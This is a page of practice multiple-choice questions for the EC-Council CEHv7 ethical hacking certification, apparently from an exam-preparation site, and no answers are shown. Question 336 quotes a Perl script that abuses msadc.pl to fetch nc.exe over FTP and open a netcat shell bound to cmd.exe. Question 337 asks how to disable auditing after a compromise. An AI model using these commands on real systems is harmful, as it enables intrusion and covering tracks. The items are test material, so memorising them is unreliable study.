1. Home
  2. EC-COUNCIL
  3. 312-50V7

EC-COUNCIL 312-50V7 Online Practice Questions and Exam Preparation

312-50V7 Exam Details

  • Exam Code
    :312-50V7
  • Exam Name
    :Ethical Hacking and Countermeasures (CEHv7)
  • Certification
    :EC-COUNCIL Certifications
  • Vendor
    :EC-COUNCIL
  • Total Questions
    :514 Q&As
  • Last Updated
    :May 31, 2026

EC-COUNCIL 312-50V7 Online Questions & Answers

  • Question 331:

    Finding tools to run dictionary and brute forcing attacks against FTP and Web servers is an easy task for hackers. They use tools such as arhontus or brutus to break into remote servers.

    A command such as this, will attack a given 10.0.0.34 FTP and Telnet servers simultaneously with a list of passwords and a single login namE. linksys. Many FTP- specific password-guessing tools are also available from major security sites. What defensive measures will you take to protect your network from these attacks?

    A. Never leave a default password
    B. Never use a password that can be found in a dictionary
    C. Never use a password related to your hobbies, pets, relatives, or date of birth.
    D. Use a word that has more than 21 characters from a dictionary as the password
    E. Never use a password related to the hostname, domain name, or anything else that can be found with whois

  • Question 332:

    A company has made the decision to host their own email and basic web services. The administrator needs to set up the external firewall to limit what protocols should be allowed to get to the public part of the company's network. Which ports should the administrator open? (Choose three.)

    A. Port 22
    B. Port 23
    C. Port 25
    D. Port 53
    E. Port 80
    F. Port 139
    G. Port 445

  • Question 333:

    Information gathered from social networking websites such as Facebook, Twitter and LinkedIn can be used to launch which of the following types of attacks? (Choose two.)

    A. Smurf attack
    B. Social engineering attack
    C. SQL injection attack
    D. Phishing attack
    E. Fraggle attack
    F. Distributed denial of service attack

  • Question 334:

    An ethical hacker for a large security research firm performs penetration tests, vulnerability tests, and risk assessments. A friend recently started a company and asks the hacker to perform a penetration test and vulnerability assessment of the new company as a favor. What should the hacker's next step be before starting work on this job?

    A. Start by foot printing the network and mapping out a plan of attack.
    B. Ask the employer for authorization to perform the work outside the company.
    C. Begin the reconnaissance phase with passive information gathering and then move into active information gathering.
    D. Use social engineering techniques on the friend's employees to help identify areas that may be susceptible to attack.

  • Question 335:

    What is the problem with this ASP script (login.asp)?

    A. The ASP script is vulnerable to Cross Site Scripting attack
    B. The ASP script is vulnerable to Session Splice attack
    C. The ASP script is vulnerable to XSS attack
    D. The ASP script is vulnerable to SQL Injection attack

  • Question 336:

    A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions:system("perl msadc.pl -h $host -C \"echo open $your >testfile\""); system("perl msadc.pl -h $host -C \"echo $user>>testfile\""); system("perl msadc.pl -h $host -C \"echo $pass>>testfile\""); system ("perl msadc.pl -h $host -C \"echo bin>>testfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>testfile\""); system("perl msadc.pl -h $host -C \"echo get hacked.html>>testfile\""); ("perl msadc.pl -h $host -C \"echo quit>>testfile\""); system("perl msadc.pl -h $host -C \"ftp \-s\:testfile\""); $o=; print "Opening ...\n"; system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");

    Which exploit is indicated by this script?

    A. A buffer overflow exploit
    B. A chained exploit
    C. A SQL injection exploit
    D. A denial of service exploit

  • Question 337:

    You have successfully gained access to a victim's computer using Windows 2003 Server SMB Vulnerability. Which command will you run to disable auditing from the cmd?

    A. stoplog stoplog ?
    B. EnterPol /nolog
    C. EventViewer o service
    D. auditpol.exe /disable

  • Question 338:

    You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles. You know that conventional hacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems. In other words you are trying to penetrate an otherwise impenetrable system. How would you proceed?

    A. Look for "zero-day" exploits at various underground hacker websites in Russia and China and buy the necessary exploits from these hackers and target the bank's network
    B. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information
    C. Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100,000 or more "zombies" and "bots"
    D. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques

  • Question 339:

    Which of the following does proper basic configuration of snort as a network intrusion detection system require?

    A. Limit the packets captured to the snort configuration file.
    B. Capture every packet on the network segment.
    C. Limit the packets captured to a single segment.
    D. Limit the packets captured to the /var/log/snort directory.

  • Question 340:

    Data hiding analysis can be useful in

    A. determining the level of encryption used to encrypt the data.
    B. detecting and recovering data that may indicate knowledge, ownership or intent.
    C. identifying the amount of central processing unit (cpu) usage over time to process the data.
    D. preventing a denial of service attack on a set of enterprise servers to prevent users from accessing the data.

Related Exams:

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only EC-COUNCIL exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your 312-50V7 exam preparations and EC-COUNCIL certification application, do not hesitate to visit our Vcedump.com to find your solutions here.